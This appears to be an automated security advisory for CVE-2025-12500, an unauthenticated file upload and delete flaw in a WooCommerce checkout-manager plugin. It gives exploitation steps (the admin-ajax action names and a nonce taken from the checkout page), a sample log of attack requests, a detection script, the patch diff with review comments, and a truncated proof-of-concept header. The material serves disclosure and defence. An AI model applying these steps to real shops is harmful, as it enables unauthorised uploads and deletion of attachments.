Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: March 18, 2026

CVE-2025-12500: Checkout Field Manager (Checkout Manager) for WooCommerce <= 7.8.1 – Unauthenticated Limited File Upload (woocommerce-checkout-manager)

Severity: Medium (CVSS 5.3)
CWE: 434
Vulnerable Version: 7.8.1
Patched Version: 7.8.2
Disclosed: February 17, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-12500:
This vulnerability is an unauthenticated limited file upload flaw in the Checkout Field Manager (Checkout Manager) for WooCommerce WordPress plugin. The issue affects all plugin versions up to and including 7.8.1. The vulnerability allows unauthenticated attackers to upload files to the server, though file types are limited to WordPress’s default allowed MIME types.

The root cause lies in the `ajax_checkout_attachment_upload` function within `/woocommerce-checkout-manager/lib/class-upload.php`. The vulnerable version lacked proper authorization checks. The function only verified a nonce via `check_admin_referer()` but did not validate whether the user was authenticated or had appropriate permissions. The `wp_ajax_nopriv_wooccm_order_attachment_update` hook in the constructor also allowed unauthenticated users to trigger file deletion. The `ajax_delete_attachment` function in `/woocommerce-checkout-manager/lib/controller/class-my-account.php` suffered from the same authorization deficiency.

Exploitation involves sending a POST request to `/wp-admin/admin-ajax.php` with the `action` parameter set to `wooccm_checkout_attachment_upload`. Attackers must include a valid nonce, which can be obtained from the checkout page, and a file upload via the `wooccm_checkout_attachment_upload` parameter. The same endpoint with `action` set to `wooccm_order_attachment_update` or `wooccm_customer_attachment_update` allows unauthenticated file deletion. Attackers can upload files limited to WordPress’s default allowed MIME types, which typically include images, documents, and archives.

The patch introduces comprehensive authorization checks. The `ajax_checkout_attachment_upload` function now validates the caller through two paths. For logged-in users, it checks `current_user_can('read')`. For guest users, it verifies an active WooCommerce session and the presence of customer data in that session. The patch removes the `wp_ajax_nopriv_wooccm_order_attachment_update` hook from the constructor. It also removes the `wp_ajax_nopriv_wooccm_customer_attachment_update` hook from the `class-my-account.php` file. The `ajax_delete_attachment` function now requires user authentication via `is_user_logged_in()`. The patch also adds a per-request file limit through a new `wooccm_max_files_per_upload` filter (default 10).

Successful exploitation allows attackers to upload arbitrary files to the server within WordPress’s allowed MIME type restrictions. This could lead to server resource exhaustion through disk space consumption. Attackers could host malicious content on the victim’s server. The vulnerability could facilitate phishing campaigns or serve as a foothold for further attacks. While file types are limited, certain allowed file types like SVG images or HTML documents could still pose security risks if improperly handled by other components.
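As an added example (not part of the advisory or the plugin's code), the following Python script runs detection logic over a constructed reverse-proxy log that records, per request, the form field names and cookie names (an assumption; stock Apache or Nginx access logs do not capture POST bodies). It flags the two request shapes described above, attachment-delete actions with no `wordpress_logged_in_` cookie and checkout uploads carrying neither a login nor a `wp_woocommerce_session_` cookie, and totals uploaded files per client to surface the disk-exhaustion pattern.

```python
"""Detection of CVE-2025-12500 request patterns against admin-ajax.php.

Assumption: records come from a reverse proxy or WAF that logs, per request,
the form field names (with the `action` value) and the cookie names seen.
"""
import json
from collections import Counter

# admin-ajax.php actions named in the advisory.
UPLOAD_ACTION = "wooccm_checkout_attachment_upload"
DELETE_ACTIONS = {"wooccm_order_attachment_update", "wooccm_customer_attachment_update"}

# Constructed JSON-lines log for the demo (not real traffic).
SAMPLE_LOG = """\
{"ts": "2026-02-18T10:00:01Z", "ip": "198.51.100.7", "method": "POST", "path": "/wp-admin/admin-ajax.php", "form": {"action": "wooccm_checkout_attachment_upload", "nonce": "c0ffee"}, "file_count": 1, "cookies": ["wp_woocommerce_session_9f1"], "status": 200}
{"ts": "2026-02-18T10:00:05Z", "ip": "203.0.113.10", "method": "POST", "path": "/wp-admin/admin-ajax.php", "form": {"action": "wooccm_checkout_attachment_upload", "nonce": "c0ffee"}, "file_count": 10, "cookies": [], "status": 200}
{"ts": "2026-02-18T10:00:06Z", "ip": "203.0.113.10", "method": "POST", "path": "/wp-admin/admin-ajax.php", "form": {"action": "wooccm_checkout_attachment_upload", "nonce": "c0ffee"}, "file_count": 10, "cookies": [], "status": 200}
{"ts": "2026-02-18T10:00:09Z", "ip": "203.0.113.10", "method": "POST", "path": "/wp-admin/admin-ajax.php", "form": {"action": "wooccm_order_attachment_update", "nonce": "c0ffee", "delete_attachments_ids": "41,42"}, "file_count": 0, "cookies": [], "status": 200}
{"ts": "2026-02-18T10:01:00Z", "ip": "192.0.2.44", "method": "POST", "path": "/wp-admin/admin-ajax.php", "form": {"action": "wooccm_customer_attachment_update", "nonce": "c0ffee", "delete_attachments_ids": "41"}, "file_count": 0, "cookies": ["wordpress_logged_in_ab12"], "status": 200}
{"ts": "2026-02-18T10:01:30Z", "ip": "192.0.2.44", "method": "POST", "path": "/wp-admin/admin-ajax.php", "form": {"action": "heartbeat"}, "file_count": 0, "cookies": ["wordpress_logged_in_ab12"], "status": 200}
"""


def parse_log(text):
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def has_cookie_prefix(rec, prefix):
    """True if any cookie name on the request starts with prefix."""
    return any(name.startswith(prefix) for name in rec.get("cookies", []))


def classify(rec):
    """Return an alert kind for one request, or None if it is not of interest.

    wp_send_json_error() answers with HTTP 200, so the status code cannot be
    used to tell a rejected request from an accepted one; only the request
    shape is inspected.
    """
    if rec.get("method") != "POST" or not rec.get("path", "").endswith("/wp-admin/admin-ajax.php"):
        return None
    action = rec.get("form", {}).get("action")
    logged_in = has_cookie_prefix(rec, "wordpress_logged_in_")
    if action in DELETE_ACTIONS and not logged_in:
        # Before 7.8.2 the wp_ajax_nopriv_ hooks let this reach the handler.
        return "unauthenticated_delete"
    if action == UPLOAD_ACTION and not logged_in and not has_cookie_prefix(rec, "wp_woocommerce_session_"):
        # Guest checkout uploads are legitimate, but 7.8.2 requires a WC session;
        # a request with neither cookie only succeeds on vulnerable versions.
        return "upload_without_session"
    return None


def analyze(records, bulk_threshold=10):
    """Produce per-request alerts plus clients whose uploaded-file total exceeds the threshold."""
    alerts = []
    uploads = Counter()
    for rec in records:
        kind = classify(rec)
        if kind:
            alerts.append((rec["ts"], rec["ip"], kind))
        if rec.get("method") == "POST" and rec.get("form", {}).get("action") == UPLOAD_ACTION:
            # The 7.8.2 cap (10 files per request by default) does not bound repeated
            # requests, so totals per client are tracked here.
            uploads[rec["ip"]] += int(rec.get("file_count", 0))
    bulk = {ip: n for ip, n in uploads.items() if n > bulk_threshold}
    return {"alerts": alerts, "bulk_uploaders": bulk}


def run_sample():
    """Run the detection over the constructed log."""
    return analyze(parse_log(SAMPLE_LOG))


if __name__ == "__main__":
    result = run_sample()
    for ts, ip, kind in result["alerts"]:
        print(f"{ts} {ip} {kind}")
    for ip, n in result["bulk_uploaders"].items():
        print(f"bulk uploader {ip}: {n} files")
```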

Differential between vulnerable and patched code

Code Diff
--- a/woocommerce-checkout-manager/jetpack_vendor/i18n-map.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/i18n-map.php
@@ -14,7 +14,7 @@
     ),
     'wp-notice-plugin-promote' => array(
       'path' => 'jetpack_vendor/quadlayers/wp-notice-plugin-promote',
-      'ver' => '1.1.7',
+      'ver' => '1.1.8',
     ),
     'wp-notice-plugin-required' => array(
       'path' => 'jetpack_vendor/quadlayers/wp-notice-plugin-required',
--- a/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/Load.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/Load.php
@@ -407,7 +407,7 @@
 			$notice = array_merge(
 				$notice,
 				array(
-					'notice_more_label' => esc_html__( 'Get more info', 'wp-notice-plugin-promote' ),
+					'notice_more_label' => esc_html__( 'Learn more', 'wp-notice-plugin-promote' ),
 				)
 			);
 		}
--- a/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/Traits/PluginActions.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/Traits/PluginActions.php
@@ -40,7 +40,7 @@
 			return $this->plugin_install_label;
 		}

-		return esc_html__( 'Install', 'wp-notice-plugin-promote' );
+		return esc_html__( 'Install free', 'wp-notice-plugin-promote' );
 	}

 	/**
--- a/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/templates/notice.php
+++ b/woocommerce-checkout-manager/jetpack_vendor/quadlayers/wp-notice-plugin-promote/src/templates/notice.php
@@ -19,18 +19,33 @@
 			<img style="border-radius:5px;max-width: 90px;" src="<?php echo esc_url( $notice_logo ); ?>">
 		</div>
 		<div class="notice-content" style="margin-left: 15px;">
-			<p>
+			<?php
+			// Check if title contains block-level HTML tags
+			$has_block_tags = ! empty( $notice_title ) && preg_match( '/<(h[1-6]|div|p|ul|ol|li|blockquote|pre|table|form|section|article|header|footer|nav|aside)b/i', $notice_title );
+			?>
+			<?php if ( $has_block_tags ) : ?>
 				<?php if ( ! empty( $notice_title ) ) : ?>
 					<?php echo wp_kses_post( $notice_title ); ?>
-					<br/>
 				<?php endif; ?>
 				<?php if ( ! empty( $notice_description ) ) : ?>
-					<?php echo wp_kses_post( $notice_description ); ?>
+					<p>
+						<?php echo wp_kses_post( $notice_description ); ?>
+					</p>
 				<?php endif; ?>
-			</p>
+			<?php else : ?>
+				<p>
+					<?php if ( ! empty( $notice_title ) ) : ?>
+						<?php echo wp_kses_post( $notice_title ); ?>
+						<br/>
+					<?php endif; ?>
+					<?php if ( ! empty( $notice_description ) ) : ?>
+						<?php echo wp_kses_post( $notice_description ); ?>
+					<?php endif; ?>
+				</p>
+			<?php endif; ?>
 			<div style="display:flex;gap: 1em;align-items: center;" >
-				<a href="#" title="<?php echo esc_html__( 'I would not, close this alert.', 'wp-notice-plugin-promote' ); ?>" class="button-secondary link-dismiss" data-notice_index="<?php echo esc_attr( $notice_index ); ?>">
-					<?php echo esc_html__( 'I would not', 'wp-notice-plugin-promote' ); ?>
+				<a href="#" title="<?php echo esc_html__( 'Not interested, close this alert.', 'wp-notice-plugin-promote' ); ?>" class="button-secondary link-dismiss" data-notice_index="<?php echo esc_attr( $notice_index ); ?>">
+					<?php echo esc_html__( 'Not interested', 'wp-notice-plugin-promote' ); ?>
 				</a>
 				<?php
 				if ( ! empty( $notice_more_link ) && ! empty( $notice_more_label ) ) :
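Review bot: in the new `$has_block_tags` check the pattern `'/<(h[1-6]|div|p|...|aside)b/i'` ends in a bare `b`, which as written requires the tag name to be followed by a literal letter b (so `<h3 style=...>` would not match); a word boundary `\b` or a `[\s>]` class is what the surrounding logic needs, so confirm the backslash was not lost. This change is also unrelated to CVE-2025-12500 and lives in the vendored promote-notice library, so it should be reviewed separately from the security fix.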
--- a/woocommerce-checkout-manager/lib/class-upload.php
+++ b/woocommerce-checkout-manager/lib/class-upload.php
@@ -11,7 +11,6 @@

 	public function __construct() {
 		add_action( 'wp_ajax_wooccm_order_attachment_update', array( $this, 'ajax_delete_attachment' ) );
-		add_action( 'wp_ajax_nopriv_wooccm_order_attachment_update', array( $this, 'ajax_delete_attachment' ) );

 		// Checkout
 		// -----------------------------------------------------------------------.
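Review bot: dropping the `wp_ajax_nopriv_wooccm_order_attachment_update` registration closes the unauthenticated path to `ajax_delete_attachment`, but the diff shows no change to that handler in class-upload.php itself, so it still relies on the `wp_ajax_` prefix alone for authentication; add an explicit `is_user_logged_in()` check inside the handler, as the patch does for the `class-my-account.php` copy, so the function stays safe if it is ever hooked elsewhere.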
@@ -34,6 +33,20 @@
 			require_once ABSPATH . 'wp-admin/includes/image.php';
 		}

+		// Security Fix: CVE-2025-12500 - Add upload limits
+		$max_files_per_upload = apply_filters( 'wooccm_max_files_per_upload', 10 );
+		if ( count( $files['name'] ) > $max_files_per_upload ) {
+			wc_add_notice(
+				sprintf(
+					/* translators: %d: maximum number of files */
+					esc_html__( 'You can only upload a maximum of %d files at once.', 'woocommerce-checkout-manager' ),
+					$max_files_per_upload
+				),
+				'error'
+			);
+			return array();
+		}
+
 		$attachment_ids = array();

 		add_filter(
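Review bot: `count( $files['name'] )` assumes the upload field is always submitted as an array (`name[]`); if a single file arrives under a scalar `name`, `count()` on a string raises a TypeError on PHP 8, so guard with `is_array( $files['name'] )` first. Note also that the `wooccm_max_files_per_upload` filter caps files per request only; repeated requests are not limited, so it bounds one request rather than total disk usage.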
@@ -141,25 +154,63 @@
 	}

 	public function ajax_checkout_attachment_upload() {
-		if ( check_admin_referer( 'wooccm_upload', 'nonce' ) && isset( $_FILES['wooccm_checkout_attachment_upload'] ) ) {
+		// Security Fix: CVE-2025-12500 - Added proper authorization checks

-			// It cannot be wp_unslash becouse it has images paths
-			// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
-			$files = wc_clean( $_FILES['wooccm_checkout_attachment_upload'] );
+		// Step 1: Verify nonce for CSRF protection
+		if ( ! check_admin_referer( 'wooccm_upload', 'nonce' ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Security check failed.', 'woocommerce-checkout-manager' ) ) );
+		}

-			if ( empty( $files ) ) {
-				wc_add_notice( esc_html__( 'No uploads were recognized. Files were not uploaded.', 'woocommerce-checkout-manager' ), 'error' );
-				wp_send_json_error();
+		// Step 2: Verify files are present
+		if ( ! isset( $_FILES['wooccm_checkout_attachment_upload'] ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'No files provided.', 'woocommerce-checkout-manager' ) ) );
+		}
+
+		// Step 3: Authorization check - Allow if user is logged in OR has valid WooCommerce session
+		$current_user      = wp_get_current_user();
+		$is_user_logged_in = $current_user->ID > 0;
+
+		if ( $is_user_logged_in ) {
+			// For logged-in users, verify they have permission to make purchases
+			if ( ! current_user_can( 'read' ) ) {
+				wp_send_json_error( array( 'message' => esc_html__( 'You do not have permission to upload files.', 'woocommerce-checkout-manager' ) ) );
+			}
+		} else {
+			// For guest users, verify they have an active WooCommerce session (checkout in progress)
+			if ( ! class_exists( 'WC' ) || ! WC()->session ) {
+				wp_send_json_error( array( 'message' => esc_html__( 'Session expired. Please refresh the page.', 'woocommerce-checkout-manager' ) ) );
 			}

-			$attachment_ids = $this->process_uploads( $files, 'wooccm_checkout_attachment_upload' );
+			// Verify WooCommerce session is initialized and valid
+			$session_handler = WC()->session;
+			if ( ! $session_handler || ! $session_handler->get_session_cookie() ) {
+				wp_send_json_error( array( 'message' => esc_html__( 'Invalid session. Please refresh the page.', 'woocommerce-checkout-manager' ) ) );
+			}

-			if ( count( $attachment_ids ) ) {
-				wp_send_json_success( $attachment_ids );
+			// Additional security: Check if customer data exists in session (indicates checkout process)
+			$customer = $session_handler->get( 'customer' );
+			if ( empty( $customer ) ) {
+				wp_send_json_error( array( 'message' => esc_html__( 'Please start checkout process before uploading files.', 'woocommerce-checkout-manager' ) ) );
 			}
-			wc_add_notice( esc_html__( 'Unknown error.', 'woocommerce-checkout-manager' ), 'error' );
-			wp_send_json_error();
 		}
+
+		// It cannot be wp_unslash becouse it has images paths
+		// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.MissingUnslash
+		$files = wc_clean( $_FILES['wooccm_checkout_attachment_upload'] );
+
+		if ( empty( $files ) ) {
+			wc_add_notice( esc_html__( 'No uploads were recognized. Files were not uploaded.', 'woocommerce-checkout-manager' ), 'error' );
+			wp_send_json_error( array( 'message' => esc_html__( 'No uploads were recognized. Files were not uploaded.', 'woocommerce-checkout-manager' ) ) );
+		}
+
+		$attachment_ids = $this->process_uploads( $files, 'wooccm_checkout_attachment_upload' );
+
+		if ( count( $attachment_ids ) ) {
+			wp_send_json_success( $attachment_ids );
+		}
+
+		wc_add_notice( esc_html__( 'Unknown error.', 'woocommerce-checkout-manager' ), 'error' );
+		wp_send_json_error( array( 'message' => esc_html__( 'Unknown error.', 'woocommerce-checkout-manager' ) ) );
 	}

 	public function update_attachment_ids( $order_id = 0 ) {
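Review bot: the guest path accepts any request carrying a WooCommerce session cookie with customer data, and WooCommerce creates such a session for any visitor who adds an item to the cart, so unauthenticated uploads remain possible by design; the effective controls here are the nonce, WordPress's allowed MIME types and the new per-request file cap, so consider rate-limiting the action per session. The comment "verify they have permission to make purchases" does not match `current_user_can( 'read' )`, which every logged-in role including Subscriber has; either adjust the comment or check a more specific capability. The `becouse` typo in the carried-over comment could be fixed while touching these lines.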
--- a/woocommerce-checkout-manager/lib/controller/class-my-account.php
+++ b/woocommerce-checkout-manager/lib/controller/class-my-account.php
@@ -15,7 +15,8 @@
 		add_action( 'show_user_profile', array( $this, 'show_files_in_user_profile' ) );

 		add_action( 'wp_ajax_wooccm_customer_attachment_update', array( $this, 'ajax_delete_attachment' ) );
-		add_action( 'wp_ajax_nopriv_wooccm_customer_attachment_update', array( $this, 'ajax_delete_attachment' ) );
+		// Security Fix: CVE-2025-12500 - Removed nopriv hook to prevent unauthenticated file deletion
+		// add_action( 'wp_ajax_nopriv_wooccm_customer_attachment_update', array( $this, 'ajax_delete_attachment' ) );

 		add_action(
 			'woocommerce_after_edit_address_form_billing',
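Review bot: the removed `wp_ajax_nopriv_wooccm_customer_attachment_update` registration is left behind as a commented-out line under the explanatory comment; delete it outright, since version control records the removal and commented-out hook registrations tend to get re-enabled.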
@@ -30,30 +31,39 @@
 	}

 	public function ajax_delete_attachment() {
-		if ( ! empty( $_REQUEST ) && check_admin_referer( 'wooccm_upload', 'nonce' ) ) {
+		// Security Fix: CVE-2025-12500 - Added proper authorization checks

-			$array1 = explode( ',', sanitize_text_field( isset( $_REQUEST['all_attachments_ids'] ) ? wp_unslash( $_REQUEST['all_attachments_ids'] ) : '' ) );
-			$array2 = explode( ',', sanitize_text_field( isset( $_REQUEST['delete_attachments_ids'] ) ? wp_unslash( $_REQUEST['delete_attachments_ids'] ) : '' ) );
+		// Step 1: Verify nonce for CSRF protection
+		if ( ! check_admin_referer( 'wooccm_upload', 'nonce' ) ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'Security check failed.', 'woocommerce-checkout-manager' ) ) );
+		}

-			if ( empty( $array1 ) || empty( $array2 ) ) {
-				wp_send_json_error( esc_html__( 'No attachment selected.', 'woocommerce-checkout-manager' ) );
-			}
+		// Step 2: Verify user is authenticated
+		if ( ! is_user_logged_in() ) {
+			wp_send_json_error( array( 'message' => esc_html__( 'You must be logged in to delete attachments.', 'woocommerce-checkout-manager' ) ) );
+		}
+
+		$array1 = explode( ',', sanitize_text_field( isset( $_REQUEST['all_attachments_ids'] ) ? wp_unslash( $_REQUEST['all_attachments_ids'] ) : '' ) );
+		$array2 = explode( ',', sanitize_text_field( isset( $_REQUEST['delete_attachments_ids'] ) ? wp_unslash( $_REQUEST['delete_attachments_ids'] ) : '' ) );
+
+		if ( empty( $array1 ) || empty( $array2 ) ) {
+			wp_send_json_error( esc_html__( 'No attachment selected.', 'woocommerce-checkout-manager' ) );
+		}

-			$attachment_ids = array_diff( $array1, $array2 );
-			if ( ! empty( $attachment_ids ) ) {
+		$attachment_ids = array_diff( $array1, $array2 );
+		if ( ! empty( $attachment_ids ) ) {

-				$user_id = get_current_user_id();
+			$user_id = get_current_user_id();

-				$customer_meta = get_user_meta( $user_id );
-				foreach ( $customer_meta as $key => $value ) {
-					if ( strpos( $key, 'wooccm' ) !== false ) {
-						if ( in_array( $value[0], $attachment_ids, true ) ) {
-							wp_delete_attachment( $value[0] );
-						}
+			$customer_meta = get_user_meta( $user_id );
+			foreach ( $customer_meta as $key => $value ) {
+				if ( strpos( $key, 'wooccm' ) !== false ) {
+					if ( in_array( $value[0], $attachment_ids, true ) ) {
+						wp_delete_attachment( $value[0] );
 					}
 				}
-				wp_send_json_success( 'Deleted successfully.', 'woocommerce-checkout-manager' );
 			}
+			wp_send_json_success( 'Deleted successfully.', 'woocommerce-checkout-manager' );
 		}
 	}

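Review bot: `wp_send_json_success( 'Deleted successfully.', 'woocommerce-checkout-manager' )` passes a text-domain string as the second argument, but that parameter of `wp_send_json_success()` is the HTTP status code; the message is not a translation call, so drop the second argument (or wrap the string in `esc_html__()` and pass the domain there). Also, when `$attachment_ids` is empty the handler now sends no JSON response at all, so the client receives an empty body; send `wp_send_json_error()` in that branch. Finally, `array_diff( $array1, $array2 )` yields the IDs in `all_attachments_ids` that are not in `delete_attachments_ids`, and those are what reach `wp_delete_attachment()`; the parameter names suggest the opposite, so confirm the client sends the remaining list under `delete_attachments_ids`.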
--- a/woocommerce-checkout-manager/vendor/composer/installed.php
+++ b/woocommerce-checkout-manager/vendor/composer/installed.php
@@ -1,9 +1,9 @@
 <?php return array(
     'root' => array(
         'name' => 'quadlayers/woocommerce-checkout-manager',
-        'pretty_version' => 'v7.8.1',
-        'version' => '7.8.1.0',
-        'reference' => 'a4766a22590545cc2d993e244a508c1abc5d74d7',
+        'pretty_version' => 'v7.8.2',
+        'version' => '7.8.2.0',
+        'reference' => 'f5eb808cd79f07ecee49f0504a5e68c135536f4d',
         'type' => 'project',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -56,9 +56,9 @@
             'dev_requirement' => false,
         ),
         'quadlayers/woocommerce-checkout-manager' => array(
-            'pretty_version' => 'v7.8.1',
-            'version' => '7.8.1.0',
-            'reference' => 'a4766a22590545cc2d993e244a508c1abc5d74d7',
+            'pretty_version' => 'v7.8.2',
+            'version' => '7.8.2.0',
+            'reference' => 'f5eb808cd79f07ecee49f0504a5e68c135536f4d',
             'type' => 'project',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
@@ -74,9 +74,9 @@
             'dev_requirement' => false,
         ),
         'quadlayers/wp-notice-plugin-promote' => array(
-            'pretty_version' => '1.1.7',
-            'version' => '1.1.7.0',
-            'reference' => 'e947d41c606f1ab679518d87f2b51230a9d74c92',
+            'pretty_version' => '1.1.8',
+            'version' => '1.1.8.0',
+            'reference' => '21c4a760a999cddd7896eba5034b7c8163dba133',
             'type' => 'jetpack-library',
             'install_path' => __DIR__ . '/../../jetpack_vendor/quadlayers/wp-notice-plugin-promote',
             'aliases' => array(),
--- a/woocommerce-checkout-manager/vendor_packages/wp-notice-plugin-promote.php
+++ b/woocommerce-checkout-manager/vendor_packages/wp-notice-plugin-promote.php
@@ -20,20 +20,52 @@
 		/**
 		 * Notice cross sell 1
 		 */
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_SLUG', 'woocommerce-direct-checkout' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_NAME', 'Direct Checkout' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_DESCRIPTION', esc_html__( 'Direct Checkout for WooCommerce allows you to reduce the steps in the checkout process by skipping the shopping cart page. This can encourage buyers to shop more and quickly. You will increase your sales reducing cart abandonment.', 'woocommerce-checkout-manager' ) );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_URL', 'https://quadlayers.com/products/woocommerce-direct-checkout/?utm_source=wooccm_plugin&utm_medium=dashboard_notice&utm_campaign=cross_sell&utm_content=direct_checkout_link' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_1_LOGO_SRC', plugins_url( '/assets/backend/img/woocommerce-direct-checkout.jpg', WOOCCM_PLUGIN_FILE ) );
+		define('WOOCCM_PROMOTE_CROSS_INSTALL_1_SLUG', 'wp-whatsapp-chat');
+		define('WOOCCM_PROMOTE_CROSS_INSTALL_1_NAME', 'Social Chat');
+		define(
+			'WOOCCM_PROMOTE_CROSS_INSTALL_1_TITLE',
+			wp_kses(
+				sprintf(
+					'<h3 style="margin:0">%s</h3>',
+					esc_html__('Turn more visitors into customers.', 'woocommerce-checkout-manager')
+				),
+				array(
+					'h3' => array(
+						'style' => array()
+					)
+				)
+			)
+		);

+		define(
+			'WOOCCM_PROMOTE_CROSS_INSTALL_1_DESCRIPTION',
+			esc_html__('Social Chat lets users contact you on WhatsApp with one click — faster support and higher conversions.', 'woocommerce-checkout-manager')
+		);
+
+		define('WOOCCM_PROMOTE_CROSS_INSTALL_1_URL', 'https://quadlayers.com/products/whatsapp-chat/?utm_source=wooccm_plugin&utm_medium=dashboard_notice&utm_campaign=cross_sell&utm_content=social_chat_link');
+		define('WOOCCM_PROMOTE_CROSS_INSTALL_1_LOGO_SRC', plugins_url('/assets/backend/img/wp-whatsapp-chat.jpeg', WOOCCM_PLUGIN_FILE));
 		/**
 		 * Notice cross sell 2
 		 */
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_SLUG', 'perfect-woocommerce-brands' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_NAME', 'Perfect WooCommerce Brands' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_DESCRIPTION', esc_html__( 'Perfect WooCommerce Brands the perfect tool to improve customer experience on your site. It allows you to highlight product brands and organize them in lists, dropdowns, thumbnails, and as a widget.', 'woocommerce-checkout-manager' ) );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_URL', 'https://quadlayers.com/products/perfect-woocommerce-brands/?utm_source=wooccm_plugin&utm_medium=dashboard_notice&utm_campaign=cross_sell&utm_content=perfect_brands_link' );
-		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_LOGO_SRC', plugins_url( '/assets/backend/img/perfect-woocommerce-brands.jpg', WOOCCM_PLUGIN_FILE ) );
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_SLUG', 'woocommerce-direct-checkout' );
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_NAME', 'Direct Checkout' );
+		define(
+			'WOOCCM_PROMOTE_CROSS_INSTALL_2_TITLE',
+			wp_kses(
+				sprintf(
+					'<h3 style="margin:0">%s</h3>',
+					esc_html__( 'Speed up your checkout process.', 'woocommerce-checkout-manager' )
+				),
+				array(
+					'h3' => array(
+						'style' => array()
+					)
+				)
+			)
+		);
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_DESCRIPTION', esc_html__( 'Reduce checkout steps by skipping the cart page. Faster purchases mean happier customers and fewer abandoned carts.', 'woocommerce-checkout-manager' ) );
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_URL', 'https://quadlayers.com/products/woocommerce-direct-checkout/?utm_source=wooccm_plugin&utm_medium=dashboard_notice&utm_campaign=cross_sell&utm_content=direct_checkout_link' );
+		define( 'WOOCCM_PROMOTE_CROSS_INSTALL_2_LOGO_SRC', plugins_url( '/assets/backend/img/woocommerce-direct-checkout.jpg', WOOCCM_PLUGIN_FILE ) );

 		new QuadLayersWP_Notice_Plugin_PromoteLoad(
 			WOOCCM_PLUGIN_FILE,
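Review bot: the cross-sell constant rewrite (new Social Chat promotion, added `_TITLE` constants, `define()` calls reformatted without WPCS spacing) is unrelated to the CVE-2025-12500 fix and roughly doubles the patch a reviewer has to audit; ship promotional changes in a separate release so the security fix can be reviewed and backported on its own.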
@@ -83,13 +115,7 @@
 					'plugin_slug'        => WOOCCM_PROMOTE_CROSS_INSTALL_1_SLUG,
 					'notice_delay'       => MONTH_IN_SECONDS * 3,
 					'notice_logo'        => WOOCCM_PROMOTE_CROSS_INSTALL_1_LOGO_SRC,
-					'notice_title'       => sprintf(
-						esc_html__(
-							'Hello! We want to invite you to try our %s plugin!',
-							'woocommerce-checkout-manager'
-						),
-						WOOCCM_PROMOTE_CROSS_INSTALL_1_NAME
-					),
+					'notice_title'       => WOOCCM_PROMOTE_CROSS_INSTALL_1_TITLE,
 					'notice_description' => WOOCCM_PROMOTE_CROSS_INSTALL_1_DESCRIPTION,
 					'notice_more_link'   => WOOCCM_PROMOTE_CROSS_INSTALL_1_URL
 				),
@@ -97,13 +123,7 @@
 					'plugin_slug'        => WOOCCM_PROMOTE_CROSS_INSTALL_2_SLUG,
 					'notice_delay'       => MONTH_IN_SECONDS * 6,
 					'notice_logo'        => WOOCCM_PROMOTE_CROSS_INSTALL_2_LOGO_SRC,
-					'notice_title'       => sprintf(
-						esc_html__(
-							'Hello! We want to invite you to try our %s plugin!',
-							'woocommerce-checkout-manager'
-						),
-						WOOCCM_PROMOTE_CROSS_INSTALL_2_NAME
-					),
+					'notice_title'       => WOOCCM_PROMOTE_CROSS_INSTALL_2_TITLE,
 					'notice_description' => WOOCCM_PROMOTE_CROSS_INSTALL_2_DESCRIPTION,
 					'notice_more_link'   => WOOCCM_PROMOTE_CROSS_INSTALL_2_URL
 				),
--- a/woocommerce-checkout-manager/woocommerce-checkout-manager.php
+++ b/woocommerce-checkout-manager/woocommerce-checkout-manager.php
@@ -4,7 +4,7 @@
  * Plugin Name:             WooCommerce Checkout Manager
  * Plugin URI:              https://quadlayers.com/products/woocommerce-checkout-manager/
  * Description:             Manage and customize WooCommerce Checkout fields (Add, Edit, Delete or re-order fields).
- * Version:                 7.8.1
+ * Version:                 7.8.2
  * Author:                  QuadLayers
  * Author URI:              https://quadlayers.com
  * License:                 GPLv3
@@ -25,7 +25,7 @@
  * Definition globals varibles
  */
 define( 'WOOCCM_PLUGIN_NAME', 'WooCommerce Checkout Manager' );
-define( 'WOOCCM_PLUGIN_VERSION', '7.8.1' );
+define( 'WOOCCM_PLUGIN_VERSION', '7.8.2' );
 define( 'WOOCCM_PLUGIN_FILE', __FILE__ );
 define( 'WOOCCM_PLUGIN_DIR', __DIR__ . DIRECTORY_SEPARATOR );
 define( 'WOOCCM_PLUGIN_BASENAME', plugin_basename( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
